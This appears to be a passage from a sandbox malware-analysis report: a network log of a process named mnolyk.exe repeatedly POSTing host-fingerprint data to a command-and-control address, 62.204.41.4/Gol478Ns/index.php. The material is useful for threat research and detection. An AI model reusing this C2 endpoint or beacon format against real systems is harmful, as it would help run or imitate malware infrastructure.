                                                                      Feb 7, 2023 23:10:19.733664036 CET | 855 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:19.798017025 CET | 855 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      741 | 192.168.2.7 | 50436 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:19.971883059 CET | 856 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:20.039480925 CET | 856 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      742 | 192.168.2.7 | 50437 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:20.219041109 CET | 857 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:20.282939911 CET | 857 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      743 | 192.168.2.7 | 50438 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:20.467632055 CET | 858 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:20.530093908 CET | 858 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      744 | 192.168.2.7 | 50439 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:20.713212013 CET | 859 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:20.776303053 CET | 859 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      745 | 192.168.2.7 | 50440 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:20.951914072 CET | 860 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.013782978 CET | 860 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      746 | 192.168.2.7 | 50441 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:21.186453104 CET | 861 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.252027988 CET | 861 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      747 | 192.168.2.7 | 50442 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:21.434130907 CET | 862 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.496160984 CET | 862 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      748 | 192.168.2.7 | 50443 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:21.669847965 CET | 863 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.732448101 CET | 863 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      749 | 192.168.2.7 | 50444 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:21.912070990 CET | 864 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:21.975343943 CET | 864 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      75 | 192.168.2.7 | 49770 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:21.455441952 CET | 190 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:21.518047094 CET | 190 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      750 | 192.168.2.7 | 50445 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:22.165070057 CET | 865 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:22.231156111 CET | 865 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      751 | 192.168.2.7 | 50446 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:22.408032894 CET | 866 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:22.473037004 CET | 866 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      752 | 192.168.2.7 | 50447 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:22.643399954 CET | 867 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:22.707236052 CET | 867 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      753 | 192.168.2.7 | 50448 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:22.892314911 CET | 868 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:22.956516027 CET | 868 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      754 | 192.168.2.7 | 50449 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:23.123641014 CET | 869 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:23.188611031 CET | 869 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      755 | 192.168.2.7 | 50450 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:23.361476898 CET | 870 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:23.426613092 CET | 870 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      756 | 192.168.2.7 | 50451 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:23.598728895 CET | 871 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:23.662494898 CET | 871 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      757 | 192.168.2.7 | 50452 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:23.844381094 CET | 872 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:23.909277916 CET | 872 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
